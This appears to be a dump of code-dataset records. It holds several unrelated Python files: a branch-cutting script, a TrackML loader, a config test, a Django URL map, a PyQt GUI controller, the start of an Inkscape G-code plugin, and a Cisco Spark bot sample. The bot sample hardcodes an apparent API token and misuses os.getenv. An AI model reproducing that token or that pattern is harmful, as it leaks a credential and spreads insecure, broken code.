new_csit_mri_list.replace(\n release_on_stable_branch, release_on_current_branch\n )\n\n with open(defaults_yaml, \"w\") as f:\n stream = ruamel.yaml.round_trip_dump(data)\n f.write(\"---\\n\")\n f.write(stream)\n\n # Handle copying and updating the csit-*.lst files\n csit_file = \"csit-jobs-{}.lst\".format(release_on_stable_branch)\n src = os.path.join(job_dir, \"integration\", csit_file)\n dest = os.path.join(\n job_dir,\n \"integration\",\n csit_file.replace(release_on_stable_branch, release_on_current_branch),\n )\n shutil.copyfile(src, dest)\n with fileinput.FileInput(dest, inplace=True) as file:\n for line in file:\n print(\n line.replace(release_on_stable_branch, release_on_current_branch),\n end=\"\",\n )\n\n\nparser = argparse.ArgumentParser(\n description=\"\"\"Creates & updates jobs for ODL projects when branch cutting.\n\n Example usage: python scripts/cut-branch.sh Phosphorus Sulfur jjb/\n\n ** If calling from tox the JOD_DIR is auto-detected so only pass the current\n and next release stream name. **\n \"\"\",\n formatter_class=RawTextHelpFormatter,\n)\nparser.add_argument(\n \"release_on_stable_branch\",\n metavar=\"RELEASE_ON_STABLE_BRANCH\",\n type=str,\n help=\"The ODL release codename for the stable branch that was cut.\",\n)\nparser.add_argument(\n \"release_on_current_branch\",\n metavar=\"RELEASE_ON_CURRENT_BRANCH\",\n type=str,\n help=\"\"\"The ODL release codename for the new {}\n (eg. Sulfur, Phosphorus).\"\"\".format(\n default_branch\n ),\n)\nparser.add_argument(\n \"job_dir\",\n metavar=\"JOB_DIR\",\n type=str,\n help=\"Path to the directory containing JJB config.\",\n)\nargs = parser.parse_args()\n\n# We only handle lower release codenames\nrelease_on_stable_branch = args.release_on_stable_branch.lower()\nrelease_on_current_branch = args.release_on_current_branch.lower()\n\ncreate_and_update_project_jobs(\n release_on_stable_branch, release_on_current_branch, args.job_dir\n)\nupdate_job_streams(release_on_stable_branch, release_on_current_branch, args.job_dir)\nupdate_integration_csit_list(\n release_on_stable_branch, release_on_current_branch, args.job_dir\n)\n","sub_path":"scripts/cut-branch-jobs.py","file_name":"cut-branch-jobs.py","file_ext":"py","file_size_in_byte":13801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"86117143","text":"\"\"\"TrackML dataset loading\"\"\"\n\n__authors__ = ['Moritz Kiehn', 'Sabrina Amrouche']\n\nimport glob\nimport os.path\nimport re\n\nimport numpy\n\nDTYPE_HITS = numpy.dtype([\n ('hit_id', 'i8'),\n ('volume_id', 'i4'),\n ('layer_id', 'i4'),\n ('module_id', 'i4'),\n ('x', 'f4'),\n ('y', 'f4'),\n ('z','f4'),\n ('ex', 'f4'),\n ('ey', 'f4'),\n ('ez','f4'),\n ('phi', 'f4'),\n ('theta', 'f4'),\n ('ephi', 'f4'),\n ('etheta', 'f4'),\n ('ncells', 'i4'), ])\nDTYPE_PARTICLES = numpy.dtype([\n ('particle_id', 'i8'),\n ('vx', 'f4'),\n ('vy', 'f4'),\n ('vz', 'f4'),\n ('px', 'f4'),\n ('py', 'f4'),\n ('pz', 'f4'),\n ('q', 'i4') ])\nDTYPE_MAPPING = numpy.dtype([('hit_id', 'i8'), ('particle_id', 'i8')])\n\ndef load_event(prefix):\n \"\"\"\n Load the full data for a single event with the given prefix.\n Returns a tuple (hits, particles, truth) where particles and truth\n can be None. Each element is a numpy structured array with field names\n identical to the CSV column names and appropriate types.\n All output arrays are sorted first by hit_id and then by particle_id.\n \"\"\"\n print(prefix)\n\n file_hits= glob.glob(prefix+\"-hits.csv*\")\n if len(file_hits)==0:\n raise Exception(\"No file found matching hits.csv* with prefix:\"+prefix)\n elif len(file_hits)>1:\n raise Exception(\"More than one file found matching hits.csv* with prefix:\"+prefix)\n else:\n file_hits=file_hits[0]\n hits = numpy.loadtxt(file_hits, dtype=DTYPE_HITS,\n delimiter=',', skiprows=1, usecols=list(range(15)))\n hits.sort(order='hit_id')\n\n file_particles= glob.glob(prefix+\"-particles.csv*\")\n if len(file_particles)==0:\n particles = None # misssing particles file is not fatal\n print(\"Warning : no file found matching particles.csv* with prefix:\"+prefix)\n elif len(file_particles)>1:\n raise Exception(\"More than one file found matching particles.csv* with prefix:\"+prefix)\n else:\n file_particles=file_particles[0]\n particles = numpy.loadtxt(file_particles, dtype=DTYPE_PARTICLES,\n delimiter=',', skiprows=1)\n particles.sort(order='particle_id')\n\n file_truth = glob.glob(prefix+\"-truth.csv*\")\n if len(file_truth)==0:\n truth = None # misssing truth file is not fatal\n print(\"Warning : no file found matching truth.csv* with prefix:\"+prefix)\n elif len(file_truth)>1:\n raise Exception(\"More than one file found matching truth.csv* with prefix:\"+prefix)\n else:\n file_truth = file_truth[0]\n truth = numpy.loadtxt(file_truth, dtype=DTYPE_MAPPING,\n delimiter=',', skiprows=1)\n truth.sort(order=['hit_id', 'particle_id'])\n\n return hits, particles, truth\n\ndef load_dataset(path):\n \"\"\"\n Provide an iterator over all events in a datset directory.\n For each event it returns a tuple (name, hits, particles, truth) where\n particles and truth can be None.\n \"\"\"\n # each event must have a hits files\n hits_files = glob.glob(os.path.join(path, 'event*-hits.csv*'))\n for f in hits_files:\n name = os.path.basename(f).split('-', maxsplit=1)[0]\n data = (name,) + load_event(os.path.join(path, name))\n yield data","sub_path":"exploratory/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"421883823","text":"#!/usr/bin/env python3\n#\n# Copyright 2018 - The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport unittest\n\nfrom acts.config import entries\n\n\nclass ConfigEntryMetaValidatorTest(unittest.TestCase):\n \"\"\"Tests the ConfigEntryMetas are all valid.\"\"\"\n\n def test_config_entries_have_valid_cli_flags(self):\n \"\"\"Tests that all config_entries have valid cli_flags.\"\"\"\n for entry in entries.config_entries:\n if entry.cli_flags is None:\n continue\n if type(entry.cli_flags) is not list:\n self.fail('Entry %s has an invalid cli_flags argument. This '\n 'value must be a string or list of strings.' % entry)\n for cli_flag in entry.cli_flags:\n if type(cli_flag) is not str:\n self.fail('Entry %s has an invalid cli_flags argument. '\n 'Flag %s is of type %s, but must be a str.' %\n (entry, cli_flag, type(cli_flag)))\n\n def test_config_entries_define_help(self):\n \"\"\"Tests that all config_entries define a help function.\"\"\"\n for entry in entries.config_entries:\n if entry.help is None:\n self.fail('Entry %s must define the help kwarg.' % entry)\n\n def test_config_entries_env_variables_has_acts_config_key(self):\n \"\"\"Tests that all env var configs have a corresponding config key.\"\"\"\n for entry in entries.config_entries:\n if entry.env_var_name is not None and entry.acts_config_key is None:\n self.fail('Entry %s defines env_var_name %s, but does not '\n 'define a corresponding acts_config_key value. In '\n 'order to access this config value during tests, '\n 'This value must be specified.')\n\n def test_config_no_conflicting_acts_config_keys(self):\n \"\"\"Tests that all config_entries have unique ACTS config keys.\n\n This will prevent values from overwriting each other.\n \"\"\"\n config_entries = entries.config_entries\n uniques = {entry.acts_config_key for entry in config_entries}\n if len(uniques) != len(config_entries):\n keys_list = [entry.acts_config_key for entry in config_entries]\n for key in uniques:\n keys_list.remove(key)\n\n self.fail('The following acts_config_keys are used at least '\n 'twice: %s. Duplicate acts_config_keys can cause values '\n 'to be overwritten, resulting in lost data.'\n % set(keys_list))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"framework/tests/config/entries_test.py","file_name":"entries_test.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"444671721","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSample code for using ciscosparkbot\n\"\"\"\n\nimport os\nfrom ciscosparkbot import SparkBot\n\n__author__ = \"scoutst\"\n__author_email__ = \"tungnx@dts.com.vn\"\n__copyright__ = \"Fork from Copyright (c) 2016 Cisco Systems, Inc.\"\n__license__ = \"Apache 2.0\"\n\n# Retrieve required details from environment variables\nbot_email = os.getenv(\"tungnx@dts.com.vn\")\nspark_token = os.getenv(\"Njk3M2UwOWItMjJmYi00MjY3LWFhZDEtMjA5YjQyMWEzYTQ3ZjE0NWZkMzItMDdi\")\nbot_url = os.getenv(\"scoutst.herokuapp.com\")\nbot_app_name = os.getenv(\"HerokuBot\")\n\ndef do_something(incoming_msg):\n \"\"\"\n Sample function to do some action.\n :param incoming_msg: The incoming message object from Spark\n :return: A text or markdown based reply\n \"\"\"\n return \"i did what you said - {}\".format(incoming_msg.text)\n\n# Create a new bot\nbot = SparkBot(bot_app_name, spark_bot_token=spark_token,\n spark_bot_url=bot_url, spark_bot_email=bot_email, debug=True)\n\n# Add new command\nbot.add_command('/dosomething', 'help for do something', do_something)\n\n# Run Bot\nbot.run(host='0.0.0.0', port=5000)\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"630006137","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom DBEmulation.views import db_tree_view, index_view, reset, cache_node, cache_tree_view, \\\n add_node, edit_node, delete_node, save_changes\nimport os\n\nsite_media = os.path.join(\n os.path.dirname(__file__), 'site_media'\n)\n\nurlpatterns = [\n url(r'^site_media/(?P.*)$', 'django.views.static.serve', {'document_root': site_media}),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^db_tree/$', db_tree_view),\n url(r'^cache_tree/$', cache_tree_view),\n url(r'^cache_node/$', cache_node),\n url(r'^add/$', add_node),\n url(r'^edit/$', edit_node),\n url(r'^delete/$', delete_node),\n url(r'^save/$', save_changes),\n url(r'^db_reset/$', reset),\n url(r'^$', index_view),\n]\n","sub_path":"QSTest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523517595","text":"import os\nimport webbrowser\n\nfrom PyQt5.QtCore import pyqtSlot, QObject\nfrom PyQt5.QtWidgets import QMessageBox, QFileDialog\n\nfrom model import hull_and_spline, hulls, plot_time\nfrom model.file_manager import create_directory, get_file_name_from_absolute_path, \\\n add_profile_used, get_coord\nfrom view.curves_dialog import CurvesDialog\nfrom view.model_generator_dialog import ModelGeneratorDialog\nfrom view.new_profile_dialog import NewProfileDialog\n\nfrom const import *\n\nDEBUG = False\n\n\nclass MyWindowController(QObject):\n \"\"\"\n This class is used to define all the logic behing my_window.py GUI\n Here you will find all button handler\n \"\"\"\n\n def __init__(self, view):\n \"\"\"\n Function used to create the controller and init each attribute\n :param view: the corresponding view (here acquisition.py)\n \"\"\"\n super(MyWindowController, self).__init__()\n\n # ATTRIBUTES\n self.view = view\n self.directory_path = \"\"\n self.first_name = \"Prénom\"\n self.last_name = \"Nom\"\n self.age = \"âge\"\n \n # MODELS\n self.path_model_hulls = \"\"\n self.path_model_hull_and_spline = \"\"\n self.path_model_wavelet = \"\"\n\n @pyqtSlot(name=\"new_profile_menu_handler\")\n def new_profile_menu_handler(self):\n \"\"\"\n Handler called when the new profile menu is triggered\n It open a new_profile_dialog.py to allow the user to fill in first name, last name and age\n If a same profile (same firstname, lastname, age) is already existing it displays a pop-up\n If everything is OK, It automagically update the UI according to the selected profile\n :return: Nothing\n \"\"\"\n self.first_name, self.last_name, self.age, accepted = NewProfileDialog.get_info()\n\n if accepted:\n DEBUG and print(\"=== my_window_controller.py === User info : \\n \" +\n \"FIRST NAME \" + self.first_name + \"\\n\" +\n \"LAST NAME \" + self.last_name + \"\\n\" +\n \"AGE \" + self.age)\n try:\n self.directory_path = create_directory(self.last_name.lower() + \"_\" + self.first_name.lower() +\n \"_\" + self.age)\n # Update label value\n self.view.update_ui(True, self.first_name, self.last_name, self.age)\n\n DEBUG and print(\"=== my_window_controller.py === DIRECTORY CREATED AT: \" + self.directory_path)\n\n except OSError:\n DEBUG and print(\"=== my_window_controller.py === DIRECTORY ALREADY EXIST AT: \" + self.directory_path)\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\"Dossier déjà existant\")\n msg.setInformativeText(\"Le patient que vous avez voulu créé existe déjà, veuillez changer de nom\")\n msg.setWindowTitle(\"Erreur\")\n msg.exec()\n\n else:\n DEBUG and print(\"=== my_window_controller.py === OPERATION CANCELED\")\n\n @pyqtSlot(name=\"load_profile_menu_handler\")\n def load_profile_menu_handler(self):\n \"\"\"\n Handler called when the load profile menu is triggered\n It opens a browse directory dialog and allow the user to select a directory\n If the directory selected is already opened in the GUI, it displays a pop up and does not open it again\n If everything is ok, It automagically update the UI according to the selected profile\n :return: Nothing\n \"\"\"\n new_path = str(QFileDialog.getExistingDirectory(self.view, \"Sélectionner un dossier\",\n PATH_TO_STORE_FILES, QFileDialog.ShowDirsOnly))\n # If the user canceled\n if not new_path:\n return\n\n old_directory_name = get_file_name_from_absolute_path(self.directory_path).strip(\"\\n\")\n new_directory_name = get_file_name_from_absolute_path(new_path).strip(\"\\n\")\n\n # If the user try to load the same profile as before\n if old_directory_name != new_directory_name:\n self.directory_path = new_path\n else:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\"Profil inchangé\")\n msg.setInformativeText(\"Le profil que vous avez chargé est déjà chargé dans l'application\")\n msg.setWindowTitle(\"Information\")\n msg.exec()\n return\n\n DEBUG and print(\"=== acquisition.py === FOLDER LOADED : \" + self.directory_path)\n\n directory_name = get_file_name_from_absolute_path(self.directory_path)\n\n try:\n [self.last_name, self.first_name, self.age] = directory_name.split(\"_\")\n\n # Add profile to \"last_profile_used\" file\n add_profile_used(directory_name)\n\n self.view.update_ui(True, self.first_name, self.last_name, self.age)\n\n DEBUG and print(\"=== acquisition.py === User info : \\n \" +\n \"FIRST NAME \" + self.first_name + \"\\n\" +\n \"LAST NAME \" + self.last_name + \"\\n\" +\n \"AGE \" + self.age)\n\n except ValueError:\n # DISPLAY POP UP ERROR AND DO NOTHING\n DEBUG and print(\"=== acquisition.py === INCORRECT FOLDER NAME\")\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\"Format de dossier incorrect\")\n msg.setInformativeText(\"Le dossier que vous avez sélectionné ne suit pas la convention qui est : \"\n \"Nom_prénom_age\")\n msg.setWindowTitle(\"Erreur\")\n msg.exec()\n return\n\n @pyqtSlot(name=\"load_last_profile_used\")\n def load_last_profile_used(self):\n \"\"\"\n Handler called when a profile is loaded from the last profile used list\n It automagically update the UI according to the selected profile\n :return: Nothing\n \"\"\"\n sending_button = self.view.sender()\n text_button = sending_button.text()\n\n try:\n [new_last_name, new_first_name, new_age] = text_button.split(\" \")\n if new_last_name == self.last_name and new_first_name == self.first_name and \\\n new_age.strip(\"\\n\") == self.age.strip(\"\\n\"):\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\"Profil inchangé\")\n msg.setInformativeText(\"Le profil récent que vous avez chargé est déjà chargé dans l'application\")\n msg.setWindowTitle(\"Information\")\n msg.exec()\n return\n else:\n [self.last_name, self.first_name, self.age] = [new_last_name, new_first_name, new_age]\n add_profile_used(self.last_name + \"_\" + self.first_name + \"_\" + self.age.strip(\"\\n\"))\n self.directory_path = os.path.abspath(PATH_TO_STORE_FILES + text_button.replace(\" \", \"_\")).strip(\"\\n\")\n self.view.update_ui(True, self.first_name, self.last_name, self.age)\n\n except ValueError:\n # DISPLAY POP UP ERROR AND DO NOTHING\n DEBUG and print(\"=== acquisition.py === INCORRECT FOLDER NAME\")\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\"Format de dossier incorrect\")\n msg.setInformativeText(\"Le profil récent que vous avez sélectionné n'est plus valide... \\n\"\n \"Veuillez en créer ou en sélectionner un autre \")\n msg.setWindowTitle(\"Erreur\")\n msg.exec()\n return\n\n @pyqtSlot(name=\"load_curves_menu_handler\")\n def load_curves_menu_handler(self):\n \"\"\"\n Handler called when the load curves menu is triggered\n It opens the curves_dialog.py and allow the user to select the curves he wants to display on the graph\n If the user confirm his operation, it updates the graph according to the selected curves\n Otherwise it does nothing\n :return: Nothing\n \"\"\"\n DEBUG and print('=== my_window_controller.py === LOAD CURVES: ' + self.directory_path)\n curves_on_graph, accepted = CurvesDialog.get_result(self.directory_path,\n self.view.tab_acquisition.get_curves_on_graph())\n DEBUG and print(\"=== my_window_controller.py === CURVES SELECTED \", str(curves_on_graph))\n # The user choose some curves\n if accepted:\n # Empty attributes and graph\n self.view.tab_acquisition.draw_curves(curves_on_graph, self.directory_path)\n\n if self.view.my_window_controller.one_model_loaded():\n acq_controller = self.view.tab_acquisition.acquisition_controller\n # TODO\n acq_controller.display_models(get_coord(os.path.join(self.directory_path,\n acq_controller.curves_on_graph[0])))\n\n else: # The user cancel his operation\n pass\n\n @pyqtSlot(name=\"load_files_model_handler\")\n def create_model_handler(self):\n \"\"\"\n Handler called when the regenerate model menu is triggered\n It opens the model_generator_dialog and allow the user to select the profile he wants to use to\n generate the the model\n According to them it regenerates the model\n :return: Nothing\n \"\"\"\n DEBUG and print('LOAD FILES' + self.directory_path)\n directories_for_model, model_name, accepted = ModelGeneratorDialog.get_result(self.directory_path)\n\n # The user choose some directories\n if accepted:\n # Replace all spaces by underscores to avoid path problems\n model_name = model_name.replace(\" \", \"_\")\n\n DEBUG and print(\"=== my_window_controller.py === selected directories: \" + str(directories_for_model))\n DEBUG and print(\"=== my_window_controller.py === model name: \" + str(model_name))\n\n if len(directories_for_model) == 0:\n DEBUG and print(\"=== my_window_controller.py === None patient selected, clearing the graph\")\n self.view.tab_hull_and_splines.clear_graph()\n self.view.tab_hulls.clear_graph()\n self.view.tab_wavelet.clear_graph()\n else:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\"Création des modèles en cours\")\n msg.setInformativeText(\"La création des modèles peut prendre un peu de temps, veuillez patienter\")\n msg.setWindowTitle(\"Information\")\n msg.exec()\n\n abs_path = os.path.abspath(PATH_TO_STORE_MODELS)\n if not os.path.isdir(abs_path):\n os.makedirs(abs_path)\n\n directories_for_model = [PATH_TO_STORE_FILES + d for d in directories_for_model]\n\n path_hulls = PATH_TO_STORE_MODELS + model_name + '_hull' + EXTENSION_HULLS_MODEL\n hulls.save_model(directories_for_model, path_hulls)\n\n path_hull_and_spline = PATH_TO_STORE_MODELS + model_name + '_hull_and_spline' + \\\n EXTENSION_HULLS_SPLINES_MODEL\n hull_and_spline.save_model(directories_for_model, path_hull_and_spline)\n\n path_wavelet = PATH_TO_STORE_MODELS + model_name + '_time_series' + EXTENSION_WAVELET_MODEL\n plot_time.save_model(directories_for_model, path_wavelet)\n\n confirmation_msg = \"La création des modèles est terminée, voulez vous les charger maintenant ?\"\n reply = QMessageBox.question(self.view, 'Création des modèles terminée !',\n confirmation_msg, QMessageBox.Yes, QMessageBox.No)\n if reply == QMessageBox.Yes:\n self.path_model_hulls = path_hulls\n self.path_model_wavelet = path_wavelet\n self.path_model_hull_and_spline = path_hull_and_spline\n acq_controller = self.view.tab_acquisition.acquisition_controller\n # TODO\n acq_controller.display_models(get_coord(os.path.join(self.directory_path,\n acq_controller.curves_on_graph[0])))\n else:\n # Do nothing\n pass\n\n else: # The user cancel his operation\n pass\n\n @pyqtSlot(name=\"load_model_menu_handler\")\n def load_model_handler(self):\n \"\"\"\n Handler called when the load model menu is triggered\n It opens a browse directory dialog and allow the user to select a file\n If the file selected does not match the pattern we want we display an error\n :return: Nothing\n \"\"\"\n my_filter = \"Model file (*\" + EXTENSION_HULLS_SPLINES_MODEL + \" *\" + EXTENSION_HULLS_MODEL + \" *\" +\\\n EXTENSION_WAVELET_MODEL + \") ;; All files (*)\"\n\n model_path, _ = QFileDialog.getOpenFileNames(self.view, caption=\"Sélectionner un modèle\",\n filter=my_filter, directory=PATH_TO_STORE_MODELS)\n # If the user canceled\n if not model_path:\n return\n\n nb_hulls_model = sum(1 for curr_path in model_path \\\n if os.path.splitext(curr_path)[1] == EXTENSION_HULLS_MODEL)\n\n nb_hull_and_splines_model = sum(1 for curr_path in model_path \\\n if os.path.splitext(curr_path)[1] == EXTENSION_HULLS_SPLINES_MODEL)\n\n nb_wavelet_model = sum(1 for curr_path in model_path \\\n if os.path.splitext(curr_path)[1] == EXTENSION_WAVELET_MODEL)\n\n informative_text = \"Vous avez sélectionné deux modèles du type TYPE. \\n\" +\\\n \"Veuillez faire attention à ne sélectionner qu'un seul modèle du type TYPE \" +\\\n \"(vérifiable grâce au nom du fichier ainsi qu'à son extension 'EXTENSION')\"\n\n if nb_hulls_model > 1:\n informative_text = informative_text.replace(\"TYPE\", \"Hulls\")\n informative_text = informative_text.replace(\"EXTENSION\", EXTENSION_HULLS_MODEL)\n\n if nb_hull_and_splines_model > 1:\n informative_text = informative_text.replace(\"TYPE\", \"Hulls and Splines\")\n informative_text = informative_text.replace(\"EXTENSION\", EXTENSION_HULLS_SPLINES_MODEL)\n\n if nb_wavelet_model > 1:\n informative_text = informative_text.replace(\"TYPE\", \"Wavelet\")\n informative_text = informative_text.replace(\"EXTENSION\", EXTENSION_WAVELET_MODEL)\n\n if nb_wavelet_model > 1 or nb_hull_and_splines_model > 1 or nb_hulls_model > 1:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Warning)\n msg.setText(\"Modèles en conflits\")\n msg.setInformativeText(informative_text)\n msg.setWindowTitle(\"Attention\")\n msg.exec()\n return\n\n # Go through each selected path\n for path in model_path:\n\n try:\n _, file_extension = os.path.splitext(path)\n\n # TODO INDICES OF CURVES\n acquisition_tab_controller = self.view.tab_acquisition.acquisition_controller\n if acquisition_tab_controller.view.has_been_drawn:\n coords = get_coord(os.path.join(self.directory_path, acquisition_tab_controller.curves_on_graph[0]))\n\n if file_extension == EXTENSION_HULLS_MODEL:\n self.path_model_hulls = path\n if acquisition_tab_controller.view.has_been_drawn:\n acquisition_tab_controller.display_models(coords)\n\n elif file_extension == EXTENSION_HULLS_SPLINES_MODEL:\n self.path_model_hull_and_spline = path\n if acquisition_tab_controller.view.has_been_drawn:\n acquisition_tab_controller.display_models(coords)\n\n elif file_extension == EXTENSION_WAVELET_MODEL:\n self.path_model_wavelet = path\n if acquisition_tab_controller.view.has_been_drawn:\n acquisition_tab_controller.display_models(coords)\n\n except ValueError:\n # DISPLAY POP UP ERROR AND DO NOTHING\n DEBUG and print(\"=== acquisition.py === INCORRECT FILE NAME\")\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\"Format de fichier incorrect\")\n msg.setInformativeText(\"Le fichier que vous avez sélectionné ne correspond pas à un fichier modèle\")\n msg.setWindowTitle(\"Erreur\")\n msg.exec()\n return\n\n if len(model_path) > 1:\n text = \"Les \" + str(len(model_path)) + \" modèles ont été chargés avec succès\"\n else:\n text = \"Le modèle a été chargé avec succès\"\n\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(text)\n msg.setWindowTitle(\"Modèles chargés avec succès\")\n msg.exec()\n return\n\n def one_model_loaded(self):\n return self.path_model_hull_and_spline != \"\" or self.path_model_hulls != \"\" or self.path_model_wavelet != \"\"\n\n def all_models_loaded(self):\n return self.path_model_hull_and_spline != \"\" and self.path_model_hulls != \"\" and self.path_model_wavelet != \"\"\n\n @pyqtSlot(name=\"user_guide_menu_handler\")\n def user_guide_menu_handler(self):\n \"\"\"\n Handler called when the user guide menu is called\n It opens a web browser to the link of our github project that contains the user guide\n :return:\n \"\"\"\n DEBUG and print('=== my_window_controller.py === ABOUT USER GUIDE')\n webbrowser.open(USER_GUIDE_GIT_LINK, new=2)\n\n @pyqtSlot(name=\"technical_guide_menu_handler\")\n def technical_guide_menu_handler(self):\n \"\"\"\n Handler called when the about menu is called\n It opens a web browser to the link of our github project that contains the technical guide\n :return:\n \"\"\"\n DEBUG and print('=== my_window_controller.py === ABOUT TECHNICAL GUIDE')\n webbrowser.open(TECHNICAL_GUIDE_GIT_LINK, new=2)","sub_path":"Cervical_GUI/controller/my_window_controller.py","file_name":"my_window_controller.py","file_ext":"py","file_size_in_byte":18610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"260699507","text":"# 1738. Find Kth Largest XOR Coordinate Value\n# vwc 225.\n\n# 2021/05/12\n# Runtime: 3584 ms, faster than 82.74% of Python3 online submissions for Find Kth Largest XOR Coordinate Value.\n# Memory Usage: 52.2 MB, less than 25.22% of Python3 online submissions for Find Kth Largest XOR Coordinate Value.\n\n# 动态规划。和二维数组的前缀和问题类似。\n# 计算出前缀异或矩阵后,排序即得答案。\n# 可以用最小堆来优化排序。\n\nclass Solution:\n def kthLargestValue(self, matrix: List[List[int]], k: int) -> int:\n n, m = len(matrix), len(matrix[0])\n xors = [ [0] * (1 + m) for _ in range(1 + n)]\n ans = []\n for i in range(n):\n for j in range(m):\n xors[i+1][j+1] = matrix[i][j] ^ xors[i][j+1] ^ xors[i+1][j] ^ xors[i][j]\n ans.append(xors[i+1][j+1])\n return sorted(ans, reverse = True)[k-1]","sub_path":"1738. Find Kth Largest XOR Coordinate Value.py","file_name":"1738. Find Kth Largest XOR Coordinate Value.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"635887822","text":"#!/usr/bin/env python\n\"\"\"\nModified by Jay Johnson 2015, J Tech Photonics, Inc., jtechphotonics.com\nmodified by Adam Polak 2014, polakiumengineering.org\n\nbased on Copyright (C) 2009 Nick Drobchenko, nick@cnc-club.ru\nbased on gcode.py (C) 2007 hugomatic...\nbased on addnodes.py (C) 2005,2007 Aaron Spike, aaron@ekips.org\nbased on dots.py (C) 2005 Aaron Spike, aaron@ekips.org\nbased on interp.py (C) 2005 Aaron Spike, aaron@ekips.org\nbased on bezmisc.py (C) 2005 Aaron Spike, aaron@ekips.org\nbased on cubicsuperpath.py (C) 2005 Aaron Spike, aaron@ekips.org\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\"\"\"\nimport inkex\nimport simpletransform\n\nimport os\nimport math\nimport bezmisc\nimport re\nimport sys\nimport time\nimport numpy\nimport gettext\n\n_ = gettext.gettext\n\n# Deprecation hack. Access the formatStyle differently for inkscape >= 1.0\ntarget_version = 1.0\n\nif target_version < 1.0:\n # simplestyle\n import simplestyle\n\n # etree\n etree = inkex.etree\n\n # cubicsuperpath\n import cubicsuperpath\n parsePath = cubicsuperpath.parsePath\n\n # Inkex.Boolean\n inkex.Boolean = bool\n\nelse:\n # simplestyle\n\n # Class and method names follow the old Inkscape API for compatibility's sake.\n # When support is dropped for older versions this can be ganged to follow PEP 8.\n class simplestyle(object): # noqa\n # I think anonymous declarations would have been cleaner. However, Python 2 doesn't like how I use them\n @staticmethod\n def formatStyle(a): # noqa\n return str(inkex.Style(a))\n\n @staticmethod\n def parseStyle(s): # noqa\n return dict(inkex.Style.parse_str(s))\n\n # etree\n from lxml import etree # noqa\n\n # cubicsuperpath\n from inkex.paths import CubicSuperPath # noqa\n parsePath = CubicSuperPath\n\n\n# Check if inkex has error messages. (0.46 version does not have one) Could be removed later.\nif \"errormsg\" not in dir(inkex):\n inkex.errormsg = lambda msg: sys.stderr.write((str(msg) + \"\\n\").encode(\"UTF-8\"))\n\n\ndef bezierslopeatt(xxx_todo_changeme, t):\n ((bx0, by0), (bx1, by1), (bx2, by2), (bx3, by3)) = xxx_todo_changeme\n ax, ay, bx, by, cx, cy, x0, y0 = bezmisc.bezierparameterize(((bx0, by0), (bx1, by1), (bx2, by2), (bx3, by3)))\n dx = 3 * ax * (t ** 2) + 2 * bx * t + cx\n dy = 3 * ay * (t ** 2) + 2 * by * t + cy\n if dx == dy == 0:\n dx = 6 * ax * t + 2 * bx\n dy = 6 * ay * t + 2 * by\n if dx == dy == 0:\n dx = 6 * ax\n dy = 6 * ay\n if dx == dy == 0:\n print_(\"Slope error x = %s*t^3+%s*t^2+%s*t+%s, y = %s*t^3+%s*t^2+%s*t+%s, t = %s, dx==dy==0\" % (\n ax, bx, cx, dx, ay, by, cy, dy, t))\n print_(((bx0, by0), (bx1, by1), (bx2, by2), (bx3, by3)))\n dx, dy = 1, 1\n\n return dx, dy\n\n\nbezmisc.bezierslopeatt = bezierslopeatt\n\n################################################################################\n#\n# Styles and additional parameters\n#\n################################################################################\n\nmath.pi2 = math.pi * 2\nstraight_tolerance = 0.0001\nstraight_distance_tolerance = 0.0001\nengraving_tolerance = 0.0001\nloft_lengths_tolerance = 0.0000001\noptions = {}\ndefaults = {\n 'header': \"\"\"\nG28\nG90\nG0 Z20\n\"\"\",\n 'footer': \"\"\"G0 Z20\nG28 X0 Y0\nM18\n\n\"\"\"\n}\n\nintersection_recursion_depth = 10\nintersection_tolerance = 0.00001\n\nstyles = {\n \"loft_style\": {\n 'main curve': simplestyle.formatStyle(\n {'stroke': '#88f', 'fill': 'none', 'stroke-width': '1', 'marker-end': 